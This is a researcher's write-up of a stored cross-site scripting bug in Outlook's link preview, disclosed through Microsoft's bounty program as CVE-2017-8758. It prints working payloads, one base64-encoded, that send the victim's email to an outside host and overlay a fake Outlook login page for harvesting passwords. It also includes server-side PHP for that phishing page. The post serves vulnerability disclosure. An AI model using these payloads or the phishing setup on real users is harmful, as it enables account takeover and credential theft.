1. Introduction

This blog post covers a cross-site scripting bug that I found on Microsoft Outlook.

I realized that it would be a good idea to write about it for myself and for the benefit of the community.

This bug could have allowed hackers to take over a victim’s account or gather sensitive data without the victim even opening an email.

2. TL;DR - PoC Video

I’m keeping the 1080p, longer, and uncensored version for myself.

3. How I Found The Bug

1) The link preview feature was the vulnerable one. However, it only worked with a group of trusted domains. If a domain was not whitelisted, it would not be fetched. So, I searched for random strings on the search bar of Microsoft.com and Xbox.com and I collected domain of the results. It was my way to find these whitelisted domains. These domains did not necessarily had to be owned by Microsoft. For example, creating Prezi presentations was also working.

2) The vulnerable component was not fetching every part of those trusted websites. So, I needed to go and check different fields of those pages, such as changing the title, description, or other parts. I was not able to edit the fetched content on some of the websites because the preview functionality was only fetching HTML meta tags and so on.

3) So, I ended up my search with creating a post on gallery.technet.microsoft.com. This was the post I used for my report: https://gallery.technet.microsoft.com/Test-etmek-icin-oneriler-c5b185d4

4) I used following payload as description/body field and it worked for me:

"><img src=x onerror= JAVASCRIPT-CODE-HERE.

5) To trigger the bug, you just need to send the URL in the email and that was it. If a victim opens or clicks the “checkbox”, the payload was working.

6) As you can guess, it was possible to edit the payload remotely. After a successful attack you could even remove payloads from that page then the email wouldn’t contain anything malicious but an URL of a page owned by Microsoft.

4. Technical Details of The PoC

1) As you can see in the PoC video above, I created a fake clone of the Outlook login page in PHP and saved login details into a MySQL database. I wanted to create a targeted (email field dynamically changes) fake page because in the original Outlook login page, it shows your email and asks for the password.

2) It was not possible to fit a big payload, so I needed to include my external JavaScript from my server, but I couldn’t do because of the CSP as I remember.

3) The following JavaScript code sends the document.title (which contains the email address of the victim) and creates an iframe of my fake login page. Note: I couldn’t find the original payload, but I wrote it manually by looking at my other PoC video, so typos may have happened.

"><img src ="x" onerror="document.write('<iframe src="https://cok.kim/?email='+document.title+'" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">')"

4) That one was breaking, so I used the following as the final encoded payload.

"><img src="x" onerror="document.write(document.write(eval(atob('JzxpZnJhbWUgc3JjPSJodHRwczovL2Nvay5raW0vP2VtYWlsPScrZG9jdW1lbnQudGl0bGUrJyIgc3R5bGU9ImJvcmRlcjogMDsgcG9zaXRpb246Zml4ZWQ7IHRvcDowOyBsZWZ0OjA7IHJpZ2h0OjA7IGJvdHRvbTowOyB3aWR0aDoxMDAlOyBoZWlnaHQ6MTAwJSI+Jw==')))" >

5) My server-side code (it parses the email address of the victim from “Posta - victim@outlook.com”):

<?php echo explode("-", $_GET['email'])[1]; ?>

5. Conclusion

Microsoft rewarded me with $5,000 and assigned a CVE (CVE-2017-8758) for this bug because it was affecting the MS Exchange Server.

In the CVE description, it is written as “Note: In order to exploit this vulnerability, a user must click a maliciously crafted link from an attacker.”. However, as you can see in the POC video, it was not even necessary to open it. When I asked about this, I learned that Microsoft writes generalized explanations to protect their users.

The PM asked if I would be attending Blackhat that year so we could meet in person. Unfortunately, I couldn’t go due to a lack of a visa and funds. I was disappointed when I didn’t see my name on the MSRC Top 100 Security Researchers of 2017 list.

For a year, I continued to report similar issues under my name and my nickname (Arif Isik, a movie character).

In 2018, I was listed 35th and Arif was 92nd on the Microsoft’s Top 100 Security Researchers list. I was also invited to BlueHat and had the chance to meet some engineers and visit the Microsoft headquarters in Seattle.